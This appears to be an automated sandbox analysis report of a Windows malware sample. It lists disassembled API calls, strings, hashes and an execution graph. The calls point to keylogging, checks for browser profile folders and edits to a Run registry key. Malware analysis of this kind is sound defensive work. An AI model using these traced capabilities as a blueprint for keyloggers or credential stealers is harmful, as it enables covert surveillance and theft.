                                                                                                • API String ID: 2315374483-813777761
                                                                                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsValidLocale.KERNEL32(00000000,*JD,00000000,00000001,?,?,00444A2A,?,?,?,?,00000004), ref: 004489F2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocaleValid
                                                                                                • String ID: *JD$IsValidLocaleName
                                                                                                • API String ID: 1901932003-3028385341
                                                                                                • Opcode ID: 3e8a7637d397ee6081e064619c1c062965aab6a3a575e50bfd46f824d2566911
                                                                                                • Instruction ID: 00ed84e355f5da9bae20177a078cc614c93cb7288f224e07fdc481b4eaf2d14a
                                                                                                • Opcode Fuzzy Hash: 3e8a7637d397ee6081e064619c1c062965aab6a3a575e50bfd46f824d2566911
                                                                                                • Instruction Fuzzy Hash: C9F0BE30A80A08F7DB106B61DC06BAE7E64CB44B12F10416AFE056B292CEB95E45969E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C4A7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                • API String ID: 1174141254-2800177040
                                                                                                • Opcode ID: 2e063ffa96777bda5fb0c71964088532bb2cef58f9105dceed0029cb0f556605
                                                                                                • Instruction ID: b80ae851aa5927822d0c51d0b35e317520b22a8e9d88b83e7a71d4e2fe34f5f7
                                                                                                • Opcode Fuzzy Hash: 2e063ffa96777bda5fb0c71964088532bb2cef58f9105dceed0029cb0f556605
                                                                                                • Instruction Fuzzy Hash: 88F05E31A0021996C604BBF69C578FF7B2C9D10709B10017FB601B21D2EE7C994186EE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C444
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                • API String ID: 1174141254-4188645398
                                                                                                • Opcode ID: dbb064bb5b4bf66a503eaaf675d666d45601800878e5ea5b066fb89d856d310f
                                                                                                • Instruction ID: 57f2599c21fdc32d718450e2580da6f8e29e9aa57867b8a4561a60834e957018
                                                                                                • Opcode Fuzzy Hash: dbb064bb5b4bf66a503eaaf675d666d45601800878e5ea5b066fb89d856d310f
                                                                                                • Instruction Fuzzy Hash: 90F05E30A0021996C604BBB69C578BF7B2C9D10709B40017FB601B21D2EE78994586EE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C50A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                • API String ID: 1174141254-1629609700
                                                                                                • Opcode ID: bfb98eb5c4fc4ad5219d5d8c2d064a843409f917bf550090613a0a5d327717e0
                                                                                                • Instruction ID: 4f687090449c5efc0469f9fcadb94194348ed293e3e387ab461cbc240459fd33
                                                                                                • Opcode Fuzzy Hash: bfb98eb5c4fc4ad5219d5d8c2d064a843409f917bf550090613a0a5d327717e0
                                                                                                • Instruction Fuzzy Hash: 55F05E30A00219A6CA04B7F69C578EF7B6C9D10709B00017BB602B21D2EE789D4586EA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000011), ref: 0040B599
                                                                                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(00000000,?,00000000), ref: 0040A414
                                                                                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A41F
                                                                                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A426
                                                                                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A430
                                                                                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43D
                                                                                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A459
                                                                                                  • Part of subcall function 0040A584: SetEvent.KERNEL32(?,?,00000000,0040B158,00000000), ref: 0040A5B0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                                                • String ID: [AltL]$[AltR]
                                                                                                • API String ID: 3195419117-2658077756
                                                                                                • Opcode ID: 09e7acf5dca60817c7f08b9e07d08db97250d0ddf7d901bec0859fbcc6ba5a63
                                                                                                • Instruction ID: 5b499cff6aaae3c53dc3e1166fb83c1288de984d5ca86385b07af6415785c0e2
                                                                                                • Opcode Fuzzy Hash: 09e7acf5dca60817c7f08b9e07d08db97250d0ddf7d901bec0859fbcc6ba5a63
                                                                                                • Instruction Fuzzy Hash: 7AE0652170021066C828323D6D1F66E2951DB41758B4001BFFC426B6CAEABD4E1546CF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetOEMCP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBD7
                                                                                                • GetACP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBEE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5D
                                                                                                • API String ID: 0-3475471828
                                                                                                • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                                                • Instruction ID: dd86e4deb3fd1fb56fb386e402429c764a368b420efd63c67ba3ad0e757172fe
                                                                                                • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                                                • Instruction Fuzzy Hash: 8DF0C831400104CBEB20DB59DC8C76A7771FB00335F144755E52A866E2C7B99C81CF8D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004160F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: !D@$open
                                                                                                • API String ID: 587946157-1586967515
                                                                                                • Opcode ID: 453d0a70b3f563ea5a3135f3bc09350ed02b1cc902b7fa42382088d4a523be4d
                                                                                                • Instruction ID: 272896446fdd02a3c20b9e2560cdc717c469be1552f5b7850574438bcff29664
                                                                                                • Opcode Fuzzy Hash: 453d0a70b3f563ea5a3135f3bc09350ed02b1cc902b7fa42382088d4a523be4d
                                                                                                • Instruction Fuzzy Hash: 98E012712483059AD614EA72DC91EFEB35CAB50755F400C3FF906954E2EF3C5C49C659
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000012), ref: 0040B5F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State
                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                • API String ID: 1649606143-2446555240
                                                                                                • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                                                • Instruction ID: 0a29407495d8d2227e56f06805126889c23c54001464371f268d9f95623807a6
                                                                                                • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                                                • Instruction Fuzzy Hash: 86E0863174431057C514363D5A2B6792911D752B54F42097FE882676CADAFF8D1603CF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D092,00000000,004752D8,004752F0,?,pth_unenc), ref: 0041397F
                                                                                                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413993
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041397D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteOpenValue
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                • API String ID: 2654517830-1051519024
                                                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                • Instruction ID: 598427e10cd0738da965e261ca374841197e4f19c32ff2ed64c8c0b72025bf2e
                                                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                • Instruction Fuzzy Hash: C0E08C71254208FBDF104F71DC06FEA772CDB01B02F1046A9BA0692091C6668E159664
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B7C4
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B7EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteDirectoryFileRemove
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3325800564-4028850238
                                                                                                • Opcode ID: 88e96a8173b682c54d564dd3c6d6f117ced71a209c30aa3c6350f34697caf810
                                                                                                • Instruction ID: 8946e93c50c242ae22eab23d4fc85e5ed07eddfaa886144743a5101fb039176e
                                                                                                • Opcode Fuzzy Hash: 88e96a8173b682c54d564dd3c6d6f117ced71a209c30aa3c6350f34697caf810
                                                                                                • Instruction Fuzzy Hash: 17E046311006129BCB14AB258848AD63398AB5031AF00086BA492A32A1EF38A809CAAC
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A273,004750F0,00000000,00000000), ref: 0040A255
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID: XQG$C}w
                                                                                                • API String ID: 2422867632-2289786348
                                                                                                • Opcode ID: 3b2bb30f866a8d561d09dfcf7fc0405b6eaa6af24d263e7c8f742c90a56f00aa
                                                                                                • Instruction ID: 2a1cbdb8206e100bb01696748888ff261754bca91143acd1fcdc8c9c5a32c2bb
                                                                                                • Opcode Fuzzy Hash: 3b2bb30f866a8d561d09dfcf7fc0405b6eaa6af24d263e7c8f742c90a56f00aa
                                                                                                • Instruction Fuzzy Hash: 37D05B609403467DE600A7308C55F7B334CE750705F40847FB589E51E1DBBC9D54961D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
                                                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 1872346434-4028850238
                                                                                                • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                                                • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                                                                • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                                                • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440C67
                                                                                                • GetLastError.KERNEL32 ref: 00440C75
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440CD0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: 77b723f1483c6ef79eaf4aa6ca227525f645002ebe34907890468f50899a5783
                                                                                                • Instruction ID: e49dfba6500d6e6d0807855c13dbf11e238b692b51ebe0c496a3b0b53f15648d
                                                                                                • Opcode Fuzzy Hash: 77b723f1483c6ef79eaf4aa6ca227525f645002ebe34907890468f50899a5783
                                                                                                • Instruction Fuzzy Hash: 04413B74900206EFEF258FA5C88477F7BA4EF45310F10416AFA555B3A1DB389D21CB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411E3E), ref: 00411ADA
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00411E3E), ref: 00411BA6
                                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BC8
                                                                                                • SetLastError.KERNEL32(0000007E,00411E3E), ref: 00411BDF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastRead
                                                                                                • String ID:
                                                                                                • API String ID: 4100373531-0
                                                                                                • Opcode ID: d73a6a570accd9d678158fa0247393ac9b593d34a1829b4547152882449a6a98
                                                                                                • Instruction ID: c8bc6cb37384f26264b50b04770b4c06cdfb05c419d180bf3ed7721445b965b7
                                                                                                • Opcode Fuzzy Hash: d73a6a570accd9d678158fa0247393ac9b593d34a1829b4547152882449a6a98
                                                                                                • Instruction Fuzzy Hash: FA419D716083059FDB248F59DC84BA7B7E8FF44715F00482EEA86876A1E738F945CB19
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:10.1%
                                                                                                Dynamic/Decrypted Code Coverage:28.7%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:91
                                                                                                execution_graph 69388 61e46964 69389 61e46990 69388->69389 69411 61e46b6f 69389->69411 69412 61e35921 69389->69412 69393 61e469f5 69394 61e39ba3 2 API calls 69393->69394 69410 61e46b69 69393->69410 69395 61e46a15 69394->69395 69399 61e39ba3 2 API calls 69395->69399 69395->69410 69397 61e46be2 69439 61e0ae03 69397->69439 69400 61e46a35 69399->69400 69400->69410 69434 61e4681d 69400->69434 69402 61e46ae1 69403 61e4681d 3 API calls 69402->69403 69402->69410 69404 61e46b03 69403->69404 69405 61e4681d 3 API calls 69404->69405 69404->69410 69406 61e46b25 69405->69406 69407 61e4681d 3 API calls 69406->69407 69406->69410 69408 61e46b47 69407->69408 69409 61e4681d 3 API calls 69408->69409 69408->69410 69409->69410 69410->69411 69438 61e0b820 free 69410->69438 69443 61e3502f 69412->69443 69414 61e3592e 69414->69411 69415 61e39ba3 69414->69415 69416 61e39bcc 69415->69416 69417 61e39c7e 69416->69417 69423 61e39bef 69416->69423 69418 61e39c90 69417->69418 69432 61e39c6c 69417->69432 69460 61e39b05 free strcmp 69417->69460 69419 61e39c98 69418->69419 69418->69432 69461 61e39b05 free strcmp 69418->69461 69419->69432 69462 61e39588 free strcmp 69419->69462 69424 61e39c49 69423->69424 69426 61e0ae03 free 69423->69426 69423->69432 69425 61e0ae03 free 69424->69425 69427 61e39c56 69425->69427 69426->69424 69427->69432 69459 61e0b820 free 69427->69459 69428 61e39ccc 69428->69432 69463 61e39588 free strcmp 69428->69463 69431 61e39ce9 69431->69432 69433 61e0ae03 free 69431->69433 69432->69393 69433->69432 69435 61e4683a 69434->69435 69464 61e23a7b 69435->69464 69437 61e46854 69437->69402 69438->69397 69440 61e0ae55 69439->69440 69441 61e0ae11 69439->69441 69440->69411 69441->69440 69442 61e0ae2e free 69441->69442 69442->69440 69444 61e35038 69443->69444 69446 61e35040 69443->69446 69444->69414 69445 61e350f5 69445->69414 69446->69445 69447 61e35921 2 API calls 69446->69447 69448 61e351fb 69447->69448 69448->69445 69449 61e0ae03 free 69448->69449 69450 61e35243 69449->69450 69456 61e354d1 free strcmp 69450->69456 69452 61e35248 69452->69445 69457 61e353d4 free strcmp 69452->69457 69454 61e35263 69454->69445 69458 61e3546e free strcmp 69454->69458 69456->69452 69457->69454 69458->69445 69459->69432 69460->69418 69461->69419 69462->69428 69463->69431 69465 61e23aaa 69464->69465 69467 61e23bdb 69465->69467 69472 61e1aaa4 69465->69472 69467->69437 69470 61e23bc0 69470->69467 69488 61e1a839 free realloc malloc 69470->69488 69489 61e1a985 69472->69489 69474 61e1aab4 69474->69467 69475 61e14718 69474->69475 69476 61e14730 69475->69476 69477 61e14799 69476->69477 69480 61e1473a 69476->69480 69478 61e13da6 3 API calls 69477->69478 69487 61e14786 69477->69487 69482 61e147ad 69478->69482 69479 61e0ae03 free 69481 61e14776 69479->69481 69480->69479 69480->69487 69481->69487 69507 61e0b519 69481->69507 69484 61e13da6 3 API calls 69482->69484 69482->69487 69485 61e14812 69484->69485 69486 61e0ae03 free 69485->69486 69485->69487 69486->69487 69487->69470 69488->69467 69490 61e1a992 69489->69490 69491 61e1a8b5 69489->69491 69492 61e1a908 69491->69492 69497 61e13da6 69491->69497 69492->69474 69494 61e1a8c5 69495 61e1a8d2 69494->69495 69501 61e1a839 free realloc malloc 69494->69501 69495->69474 69498 61e13e8a 69497->69498 69499 61e13dc2 69497->69499 69498->69494 69499->69498 69502 61e2a6af malloc 69499->69502 69501->69495 69503 61e2a6d5 69502->69503 69504 61e2a6c8 69502->69504 69506 61e2a4ce free realloc malloc 69503->69506 69504->69498 69506->69504 69508 61e0ae03 free 69507->69508 69509 61e0b539 69508->69509 69510 61e0b558 69509->69510 69511 61e0ae03 free 69509->69511 69510->69487 69511->69509 69512 61e2cb72 69513 61e2cb91 69512->69513 69514 61e2cbc3 69513->69514 69515 61e13da6 3 API calls 69513->69515 69525 61e2c904 69514->69525 69517 61e2cba6 69515->69517 69517->69514 69518 61e2cbaf 69517->69518 69538 61e1a839 free realloc malloc 69518->69538 69520 61e2cbb6 69539 61e11243 69520->69539 69522 61e2cc11 69522->69520 69524 61e0ae03 free 69522->69524 69523 61e2cc37 69524->69520 69526 61e2c93b 69525->69526 69527 61e2c9ba 69526->69527 69529 61e2c904 4 API calls 69526->69529 69528 61e23a7b 3 API calls 69527->69528 69537 61e2ca7f 69527->69537 69531 61e2caa1 69528->69531 69530 61e2ca25 69529->69530 69532 61e2c904 4 API calls 69530->69532 69530->69537 69534 61e2cae2 69531->69534 69535 61e2cac0 69531->69535 69532->69527 69533 61e23a7b 3 API calls 69533->69537 69534->69533 69534->69537 69543 61e2a0e4 free memmove realloc malloc 69535->69543 69537->69522 69538->69520 69540 61e11206 69539->69540 69541 61e11231 69540->69541 69544 61e0c05c 69540->69544 69541->69523 69543->69537 69545 61e0c035 69544->69545 69547 61e0c050 69545->69547 69548 61e0b29f free 69545->69548 69547->69541 69548->69547 69549 427050 69589 42c510 69549->69589 69551 42705c GetStartupInfoW 69552 427070 HeapSetInformation 69551->69552 69554 42707b 69551->69554 69552->69554 69590 42a0fd HeapCreate 69554->69590 69555 4270c9 69556 4270d4 69555->69556 69719 427027 68 API calls 3 library calls 69555->69719 69591 42b3c0 GetModuleHandleW 69556->69591 69559 4270da 69560 4270e5 __RTC_Initialize 69559->69560 69720 427027 68 API calls 3 library calls 69559->69720 69616 42c821 GetStartupInfoW 69560->69616 69564 4270ff GetCommandLineA 69629 42f1bf GetEnvironmentStringsW 69564->69629 69571 427124 69653 42ee8e 69571->69653 69574 42712a 69575 427135 69574->69575 69723 429ed1 68 API calls 3 library calls 69574->69723 69673 429cb0 69575->69673 69578 42713d 69579 427148 69578->69579 69724 429ed1 68 API calls 3 library calls 69578->69724 69679 42ee2f 69579->69679 69589->69551 69590->69555 69592 42b3d4 69591->69592 69593 42b3dd GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69591->69593 69726 42b10d 72 API calls _free 69592->69726 69594 42b427 TlsAlloc 69593->69594 69598 42b536 69594->69598 69599 42b475 TlsSetValue 69594->69599 69596 42b3d9 69596->69559 69598->69559 69599->69598 69600 42b486 69599->69600 69727 429c59 RtlEncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 69600->69727 69602 42b48b EncodePointer EncodePointer EncodePointer EncodePointer 69728 42cb71 InitializeCriticalSectionAndSpinCount 69602->69728 69604 42b4ca 69605 42b531 69604->69605 69606 42b4ce DecodePointer 69604->69606 69736 42b10d 72 API calls _free 69605->69736 69608 42b4e3 69606->69608 69608->69605 69729 4279f2 69608->69729 69611 42b501 DecodePointer 69612 42b512 69611->69612 69612->69605 69613 42b516 69612->69613 69735 42b14a 68 API calls 4 library calls 69613->69735 69615 42b51e GetCurrentThreadId 69615->69598 69617 4279f2 __calloc_crt 68 API calls 69616->69617 69623 42c83f 69617->69623 69618 42c9ea GetStdHandle 69624 42c9b4 69618->69624 69619 42ca4e SetHandleCount 69628 4270f3 69619->69628 69620 4279f2 __calloc_crt 68 API calls 69620->69623 69621 42c9fc GetFileType 69621->69624 69622 42c934 69622->69624 69625 42c960 GetFileType 69622->69625 69626 42c96b InitializeCriticalSectionAndSpinCount 69622->69626 69623->69620 69623->69622 69623->69624 69623->69628 69624->69618 69624->69619 69624->69621 69627 42ca22 InitializeCriticalSectionAndSpinCount 69624->69627 69625->69622 69625->69626 69626->69622 69626->69628 69627->69624 69627->69628 69628->69564 69721 429ed1 68 API calls 3 library calls 69628->69721 69630 42f1db WideCharToMultiByte 69629->69630 69631 42710f 69629->69631 69633 42f210 69630->69633 69634 42f248 FreeEnvironmentStringsW 69630->69634 69642 42f104 69631->69642 69748 4279ad 69633->69748 69634->69631 69637 42f21e WideCharToMultiByte 69638 42f230 69637->69638 69639 42f23c FreeEnvironmentStringsW 69637->69639 69754 424a4f 69638->69754 69639->69631 69641 42f238 69641->69639 69643 42f119 69642->69643 69644 42f11e GetModuleFileNameA 69642->69644 69792 42bce2 96 API calls __setmbcp 69643->69792 69646 42f145 69644->69646 69786 42ef6a 69646->69786 69648 427119 69648->69571 69722 429ed1 68 API calls 3 library calls 69648->69722 69650 4279ad __malloc_crt 68 API calls 69651 42f187 69650->69651 69651->69648 69652 42ef6a _parse_cmdline 78 API calls 69651->69652 69652->69648 69654 42ee97 69653->69654 69656 42ee9c _strlen 69653->69656 69794 42bce2 96 API calls __setmbcp 69654->69794 69657 4279f2 __calloc_crt 68 API calls 69656->69657 69660 42eeaa 69656->69660 69663 42eed1 _strlen 69657->69663 69658 42ef20 69659 424a4f _free 68 API calls 69658->69659 69659->69660 69660->69574 69661 4279f2 __calloc_crt 68 API calls 69661->69663 69662 42ef46 69664 424a4f _free 68 API calls 69662->69664 69663->69658 69663->69660 69663->69661 69663->69662 69666 42ef5d 69663->69666 69795 424fa1 68 API calls _raise 69663->69795 69664->69660 69796 42a28a 10 API calls __call_reportfault 69666->69796 69669 42ef69 69670 42eff6 69669->69670 69797 43392a 78 API calls x_ismbbtype_l 69669->69797 69671 42f0f4 69670->69671 69672 43392a 78 API calls __wincmdln 69670->69672 69671->69574 69672->69670 69674 429cbe __IsNonwritableInCurrentImage 69673->69674 69798 42ec4a 69674->69798 69676 429cdc __initterm_e 69678 429cfd __IsNonwritableInCurrentImage 69676->69678 69801 425f8e 78 API calls __cinit 69676->69801 69678->69578 69680 42ee3d 69679->69680 69682 42ee42 69679->69682 69802 42bce2 96 API calls __setmbcp 69680->69802 69683 42714e 69682->69683 69803 43392a 78 API calls x_ismbbtype_l 69682->69803 69685 40e0ba 43 API calls 69683->69685 69804 422fe0 69685->69804 69688 40e3df _memset 69806 40142f 69688->69806 69691 40e567 _memset 69843 41da98 LoadLibraryA 69691->69843 69694 40e6ec _memset 69849 401000 CreateDCA GetDeviceCaps ReleaseDC 69694->69849 69697 40e871 _memset 69698 401000 4 API calls 69697->69698 69699 40e879 41 API calls 69698->69699 69700 40e9f6 _memset 69699->69700 69852 40103b FlsAlloc 69700->69852 69702 40e9fe 41 API calls 69703 40eb7b _memset 69702->69703 69853 409aa7 69703->69853 69706 40ed00 _memset 69707 409aa7 8 API calls 69706->69707 69708 40ed08 41 API calls 69707->69708 69709 40ee85 _memset 69708->69709 69710 409aa7 8 API calls 69709->69710 69711 40ee8d 41 API calls 69710->69711 69712 40f00a _memset 69711->69712 69860 40dcb7 69712->69860 69719->69556 69720->69560 69726->69596 69727->69602 69728->69604 69731 4279fb 69729->69731 69732 427a38 69731->69732 69733 427a19 Sleep 69731->69733 69737 42c1f6 69731->69737 69732->69605 69732->69611 69734 427a2e 69733->69734 69734->69731 69734->69732 69735->69615 69736->69598 69738 42c202 69737->69738 69739 42c21d 69737->69739 69738->69739 